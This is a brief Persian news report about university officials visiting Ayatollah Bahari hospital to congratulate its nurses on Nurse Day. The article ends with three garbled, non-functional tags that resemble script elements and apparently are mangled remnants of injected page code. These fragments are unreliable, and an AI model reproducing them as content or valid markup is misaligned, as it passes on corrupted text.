بازدید مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه از بیمارستان آیت الله بهاری و تبریک روز پرستار به پرسنل پرستاری

مهندس رحیمی معاون توسعه مدیریت و منابع، مهندس شیرین دخت مدیر حراست و مدیران حوزه معاونت توسعه دانشگاه به مناسبت فرا رسیدن روز پرستار از بیمارستان آیت الله بهاری بازدید کردند.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، مهندس رحیمی معاون توسعه مدیریت و منابع به همراه مهندس شیرین دخت مدیر حراست، دکتر نیاستی مدیر ، مهندس آقایانی مدیر امور رفاهی و پشتیبانی و دکتر رستگار مدیر منابع انسانی دانشگاه به مناسبت فرا رسیدن روز پرستار از بیمارستان آیت الله بهاری بازدید کردند و به پرسنل پرستاری آن بیمارستان تبریک گفتند.

در این بازدید با اهدا گل و شیرینی به پرستاران خدوم و زحمت کش بیمارستان آیت الله بهاری، از زحمات آنان تقدیر شد.

در پایان مهندس بهروز رحیمی اظهار داشت: مردم عزیز کشورمان، ایران اسلامی همیشه قدردان زحمات پرسنل پرستاری هستند و از عملکرد آنان در همه حال تقدیر می کنند و شما پرستاران عزیز سرمایه های بالقوه دانشگاه و نظام سلامت کشور هستید.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>